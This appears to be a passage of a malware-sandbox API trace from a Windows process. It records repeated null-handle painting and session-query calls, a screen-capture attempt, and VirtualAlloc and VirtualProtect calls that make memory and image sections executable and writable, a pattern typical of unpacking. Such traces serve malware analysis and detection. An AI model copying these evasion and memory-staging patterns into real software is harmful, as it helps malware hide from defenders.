(pMemory=0x0) [0037.591] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.591] TextOutW (hdc=0x0, x=4173, y=5525, lpString="", c=0) returned 1 [0037.591] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.591] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.591] WTSFreeMemory (pMemory=0x0) [0037.592] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.592] TextOutW (hdc=0x0, x=4183, y=5550, lpString="", c=0) returned 1 [0037.592] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.592] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.592] WTSFreeMemory (pMemory=0x0) [0037.592] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.592] TextOutW (hdc=0x0, x=4193, y=5575, lpString="", c=0) returned 1 [0037.592] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.592] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.592] WTSFreeMemory (pMemory=0x0) [0037.593] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.593] TextOutW (hdc=0x0, x=4203, y=5600, lpString="", c=0) returned 1 [0037.593] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.593] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.593] WTSFreeMemory (pMemory=0x0) [0037.593] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.593] TextOutW (hdc=0x0, x=4213, y=5625, lpString="", c=0) returned 1 [0037.593] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.593] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.593] WTSFreeMemory (pMemory=0x0) [0037.594] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.594] TextOutW (hdc=0x0, x=4223, y=5650, lpString="", c=0) returned 1 [0037.594] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.594] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.594] WTSFreeMemory (pMemory=0x0) [0037.594] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.594] TextOutW (hdc=0x0, x=4233, y=5675, lpString="", c=0) returned 1 [0037.594] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.594] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.594] WTSFreeMemory (pMemory=0x0) [0037.595] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.595] TextOutW (hdc=0x0, x=4243, y=5700, lpString="", c=0) returned 1 [0037.595] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.595] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.595] WTSFreeMemory (pMemory=0x0) [0037.595] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.595] TextOutW (hdc=0x0, x=4253, y=5725, lpString="", c=0) returned 1 [0037.595] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.595] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.595] WTSFreeMemory (pMemory=0x0) [0037.595] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.595] TextOutW (hdc=0x0, x=4263, y=5750, lpString="", c=0) returned 1 [0037.595] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.595] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.596] WTSFreeMemory (pMemory=0x0) [0037.596] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.596] TextOutW (hdc=0x0, x=4273, y=5775, lpString="", c=0) returned 1 [0037.596] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.596] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.596] WTSFreeMemory (pMemory=0x0) [0037.596] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.596] TextOutW (hdc=0x0, x=4283, y=5800, lpString="", c=0) returned 1 [0037.596] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.596] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.597] WTSFreeMemory (pMemory=0x0) [0037.597] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.597] TextOutW (hdc=0x0, x=4293, y=5825, lpString="", c=0) returned 1 [0037.597] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.597] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.597] WTSFreeMemory (pMemory=0x0) [0037.597] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.597] TextOutW (hdc=0x0, x=4303, y=5850, lpString="", c=0) returned 1 [0037.597] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.597] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.598] WTSFreeMemory (pMemory=0x0) [0037.598] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.598] TextOutW (hdc=0x0, x=4313, y=5875, lpString="", c=0) returned 1 [0037.598] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.598] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.598] WTSFreeMemory (pMemory=0x0) [0037.598] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.598] TextOutW (hdc=0x0, x=4323, y=5900, lpString="", c=0) returned 1 [0037.598] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.598] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.598] WTSFreeMemory (pMemory=0x0) [0037.599] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.599] TextOutW (hdc=0x0, x=4333, y=5925, lpString="", c=0) returned 1 [0037.599] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.599] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.599] WTSFreeMemory (pMemory=0x0) [0037.599] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.599] TextOutW (hdc=0x0, x=4343, y=5950, lpString="", c=0) returned 1 [0037.599] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.599] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.599] WTSFreeMemory (pMemory=0x0) [0037.599] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.599] TextOutW (hdc=0x0, x=4353, y=5975, lpString="", c=0) returned 1 [0037.599] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.600] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.600] WTSFreeMemory (pMemory=0x0) [0037.600] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.600] TextOutW (hdc=0x0, x=4363, y=6000, lpString="", c=0) returned 1 [0037.600] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.600] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.600] WTSFreeMemory (pMemory=0x0) [0037.600] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.600] TextOutW (hdc=0x0, x=4373, y=6025, lpString="", c=0) returned 1 [0037.600] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.600] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.601] WTSFreeMemory (pMemory=0x0) [0037.601] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.601] TextOutW (hdc=0x0, x=4383, y=6050, lpString="", c=0) returned 1 [0037.601] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.601] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.601] WTSFreeMemory (pMemory=0x0) [0037.601] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.601] TextOutW (hdc=0x0, x=4393, y=6075, lpString="", c=0) returned 1 [0037.601] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.601] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.602] WTSFreeMemory (pMemory=0x0) [0037.602] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.602] TextOutW (hdc=0x0, x=4403, y=6100, lpString="", c=0) returned 1 [0037.602] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.602] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.602] WTSFreeMemory (pMemory=0x0) [0037.602] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.602] TextOutW (hdc=0x0, x=4413, y=6125, lpString="", c=0) returned 1 [0037.602] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.602] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.602] WTSFreeMemory (pMemory=0x0) [0037.603] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.603] TextOutW (hdc=0x0, x=4423, y=6150, lpString="", c=0) returned 1 [0037.603] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.603] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.603] WTSFreeMemory (pMemory=0x0) [0037.603] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.603] TextOutW (hdc=0x0, x=4433, y=6175, lpString="", c=0) returned 1 [0037.603] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.603] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.603] WTSFreeMemory (pMemory=0x0) [0037.604] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.604] TextOutW (hdc=0x0, x=4443, y=6200, lpString="", c=0) returned 1 [0037.604] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.604] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.604] WTSFreeMemory (pMemory=0x0) [0039.165] OleCreatePictureIndirect () returned 0x80004005 [0039.172] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x18b400 | out: ppstm=0x18b400*=0x58f6e0) returned 0x0 [0039.172] GetDC (hWnd=0x0) returned 0x0 [0039.172] CreateCompatibleDC (hdc=0x0) returned 0x0 [0039.172] GetDeviceCaps (hdc=0x0, index=8) returned 0 [0039.172] GetDeviceCaps (hdc=0x0, index=10) returned 0 [0039.172] CreateCompatibleBitmap (hdc=0x0, cx=-1, cy=-1777727478) returned 0x0 [0039.172] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0039.172] BitBlt (hdc=0x0, x=0, y=0, cx=-1, cy=-1777727478, hdcSrc=0x0, x1=121706, y1=147225, rop=0xcc0020) returned 0 [0039.172] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0039.172] DeleteDC (hdc=0x0) returned 0 [0039.172] DeleteDC (hdc=0x0) returned 0 [0039.173] SetMenuItemInfoA (hmenu=0x0, item=0x7aa, fByPositon=0, lpmii=0x18ac88) returned 0 [0039.173] GetLastError () returned 0x579 [0039.173] GetMenuItemInfoA (in: hmenu=0x0, item=0x7aa, fByPosition=0, lpmii=0x18ac54 | out: lpmii=0x18ac54) returned 0 [0039.173] BeginPaint (in: hWnd=0x0, lpPaint=0x18ac08 | out: lpPaint=0x18ac08) returned 0x0 [0039.173] EndPaint (hWnd=0x0, lpPaint=0x18ac08) returned 0 [0039.173] GetClientRect (in: hWnd=0x0, lpRect=0x18abd0 | out: lpRect=0x18abd0) returned 0 [0039.173] ImmGetDefaultIMEWnd () returned 0x0 [0039.175] GetModuleHandleA (lpModuleName="ntdll") returned 0x76f70000 [0039.175] GetModuleHandleA (lpModuleName="advapi32") returned 0x74ea0000 [0039.187] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x560000 [0039.212] VirtualFree (lpAddress=0x560000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0039.214] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x560000 [0039.236] VirtualFree (lpAddress=0x560000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0039.238] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x560000 [0039.259] VirtualFree (lpAddress=0x560000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0039.261] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x560000 [0039.279] VirtualFree (lpAddress=0x560000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0039.282] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x560000 [0039.300] VirtualFree (lpAddress=0x560000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0039.302] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x560000 [0039.321] VirtualFree (lpAddress=0x560000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0039.323] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x560000 [0039.342] VirtualFree (lpAddress=0x560000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0039.344] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x560000 [0039.362] VirtualFree (lpAddress=0x560000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0039.364] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x560000 [0039.383] VirtualFree (lpAddress=0x560000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0039.385] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x560000 [0039.405] VirtualFree (lpAddress=0x560000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0039.407] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x560000 [0039.426] VirtualFree (lpAddress=0x560000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0039.428] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x560000 [0039.448] VirtualFree (lpAddress=0x560000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0039.451] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x560000 [0039.470] VirtualFree (lpAddress=0x560000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0039.472] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x560000 [0040.675] VirtualProtect (in: lpAddress=0x10000000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x2) returned 1 [0040.675] VirtualProtect (in: lpAddress=0x10001000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.675] VirtualProtect (in: lpAddress=0x10002000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.675] VirtualProtect (in: lpAddress=0x10003000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.675] VirtualProtect (in: lpAddress=0x10004000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.675] VirtualProtect (in: lpAddress=0x10005000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.675] VirtualProtect (in: lpAddress=0x10006000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.675] VirtualProtect (in: lpAddress=0x10007000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.675] VirtualProtect (in: lpAddress=0x10008000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.675] VirtualProtect (in: lpAddress=0x10009000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.675] VirtualProtect (in: lpAddress=0x1000a000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.675] VirtualProtect (in: lpAddress=0x1000b000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.675] VirtualProtect (in: lpAddress=0x1000c000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.675] VirtualProtect (in: lpAddress=0x1000d000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.675] VirtualProtect (in: lpAddress=0x1000e000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.675] VirtualProtect (in: lpAddress=0x1000f000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.675] VirtualProtect (in: lpAddress=0x10010000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.675] VirtualProtect (in: lpAddress=0x10011000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.675] VirtualProtect (in: lpAddress=0x10012000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.675] VirtualProtect (in: lpAddress=0x10013000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.675] VirtualProtect (in: lpAddress=0x10014000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.675] VirtualProtect (in: lpAddress=0x10015000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.675] VirtualProtect (in: lpAddress=0x10016000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.676] VirtualProtect (in: lpAddress=0x10017000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.676] VirtualProtect (in: lpAddress=0x10018000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.676] VirtualProtect (in: lpAddress=0x10019000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.676] VirtualProtect (in: lpAddress=0x1001a000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.676] VirtualProtect (in: lpAddress=0x1001b000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.676] VirtualProtect (in: lpAddress=0x1001c000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.676] VirtualProtect (in: lpAddress=0x1001d000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.676] VirtualProtect (in: lpAddress=0x1001e000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.676] VirtualProtect (in: lpAddress=0x1001f000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.676] VirtualProtect (in: lpAddress=0x10020000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.676] VirtualProtect (in: lpAddress=0x10021000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.676] VirtualProtect (in: lpAddress=0x10022000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.676] VirtualProtect (in: lpAddress=0x10023000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.676] VirtualProtect (in: lpAddress=0x10024000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.676] VirtualProtect (in: lpAddress=0x10025000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.676] VirtualProtect (in: lpAddress=0x10026000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x20) returned 1 [0040.676] VirtualProtect (in: lpAddress=0x10027000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x2) returned 1 [0040.676] VirtualProtect (in: lpAddress=0x10028000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x2) returned 1 [0040.676] VirtualProtect (in: lpAddress=0x10029000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x2) returned 1 [0040.676] VirtualProtect (in: lpAddress=0x1002a000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x2) returned 1 [0040.676] VirtualProtect (in: lpAddress=0x1002b000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x2) returned 1 [0040.676] VirtualProtect (in: lpAddress=0x1002c000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x2) returned 1 [0040.676] VirtualProtect (in: lpAddress=0x1002d000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x2) returned 1 